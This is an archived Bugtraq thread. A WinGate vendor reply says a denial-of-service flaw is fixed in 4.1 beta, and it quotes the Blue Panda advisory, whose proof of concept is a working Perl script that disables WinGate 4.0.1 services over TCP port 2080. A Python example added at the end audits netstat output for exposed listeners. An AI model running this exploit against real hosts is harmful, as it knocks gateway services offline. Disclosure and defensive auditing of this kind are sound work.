Bugtraq mailing list archives
Re: Wingate 4.0.1 denial-of-service
From: Doug Kassuba <dkassuba () I2K NET>
Date: Mon, 2 Oct 2000 18:51:34 -0000
We used your information to analyse this weakness and it was fixed for the next release, which will be the beta version of WinGate 4.1. This is currently available at http://wingate.deerfield.com/beta

For normal use it is not too serious a vulnerability as the Winsock Redirector Service is by default only bound to the local network adaptors and there is no point in binding it to public (internet) adaptors, meaning that the attack would have to be launched from within the LAN. GateKeeper will warn the operator when they bind the Winsock Redirector Service to a public adaptor.

WinGate Development Team

=================================================================
Blue Panda Vulnerability Announcement: Wingate 4.0.1
02/10/2000 (dd/mm/yyyy)

bluepanda () dwarf box sk
http://bluepanda.box.sk/
=================================================================
Details available in attached file.
=================================================================
Blue Panda Vulnerability Announcement: Wingate 4.0.1
02/10/2000 (dd/mm/yyyy)

bluepanda () dwarf box sk
http://bluepanda.box.sk/
=================================================================
Problem: The Wingate engine can be disabled by sending an abnormal string to
the Winsock Redirector Service. The attack is not logged.
Vulnerable: Wingate Home/Standard/Pro 4.0.1, possible prior versions (untested).
Immune: Wingate 4.1 Beta A
Vendor status: Notified.

===================
Proof of concept:
===================

#!/usr/bin/perl
#
# wgate401.pl - Wingate 4.0.1 denial-of-service
# Blue Panda - bluepanda () dwarf box sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Causes all Wingate services to become unavailable until the Wingate Engine
# is restarted. The Winsock Redirector Service must be enabled in order for
# this to work. Tested on the evaluation version of Wingate Pro 4.0.1.
#

use IO::Socket;

$host = "host.com";
$port = "2080";
$sleepfor = 1;

print "Wingate 4.0.1 denial-of-service
Blue Panda - bluepanda\@dwarf.box.sk
http://bluepanda.box.sk/
----------------------------------------------------------
Disclaimer: this file is intended as proof of concept, and
is not intended to be used for illegal purposes. I accept
no responsibility for damage incurred by the use of it.
----------------------------------------------------------
Causes all Wingate services to become unavailable until the Wingate Engine
is restarted. The Winsock Redirector Service must be enabled in order for
this to work.\n\n";

# Connect to the Winsock Redirector Service.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";

# Send some characters to the Winsock Redirector Service.
$buffer = "a" x 1079;
print $socket "$buffer";

# Wait a few seconds.
$counter = 0;
print "Sleeping for $sleepfor seconds.";
while($counter < $sleepfor) {
    sleep(1);
    print ".";
    $counter += 1;
}
print "\n";

# Close the connection. The Winsock Redirector Service should now be
# disabled.
close($socket);

# Connect once more to the Winsock Redirector Service. This will disable all
# other services.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";

# Finished.
close($socket);
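
The vendor reply above notes that exposure depends on which adaptors the Winsock Redirector Service is bound to. The following is an added example, not part of the original posts and not WinGate code: it audits `netstat -an` output from the gateway and flags TCP listeners on port 2080 (the port used in the script above) that are bound to a wildcard or non-LAN address. The sample output, the function names and the list of LAN ranges are assumptions made for illustration.

```python
import ipaddress
import re

WRS_PORT = 2080  # assumption: the service listens on the port the advisory's script targets

# Assumed definition of "local network" addresses: RFC 1918, loopback, link-local.
LAN_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "::1/128", "fe80::/10", "fc00::/7")]

# Constructed sample of Windows `netstat -an` output (not taken from the page).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State
  TCP    192.168.0.1:2080       0.0.0.0:0              LISTENING
  TCP    203.0.113.10:2080      0.0.0.0:0              LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    192.168.0.1:2080       192.168.0.23:1045      ESTABLISHED
  UDP    0.0.0.0:2080           *:*
"""

LISTEN_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s*$", re.I)

def wrs_listeners(netstat_text, port=WRS_PORT):
    """Return the local addresses that have a TCP listener on `port`."""
    found = []
    for line in netstat_text.splitlines():
        m = LISTEN_RE.match(line)
        if m and int(m.group(2)) == port:
            found.append(m.group(1).strip("[]"))  # drop IPv6 brackets
    return found

def is_lan_only(addr):
    """True only when addr falls inside one of the LAN ranges above.
    Wildcard binds (0.0.0.0, ::) and unparsable addresses return False."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False  # cannot classify: report it for manual review
    return any(ip in net for net in LAN_NETS)

def exposed_bindings(netstat_text, port=WRS_PORT):
    """Listener addresses on `port` reachable from outside the LAN."""
    return [a for a in wrs_listeners(netstat_text, port) if not is_lan_only(a)]

if __name__ == "__main__":
    for addr in exposed_bindings(SAMPLE_NETSTAT):
        print(f"port {WRS_PORT} is listening on non-LAN address {addr}")
```

A wildcard bind is reported because it covers every adaptor on the host, including any public one.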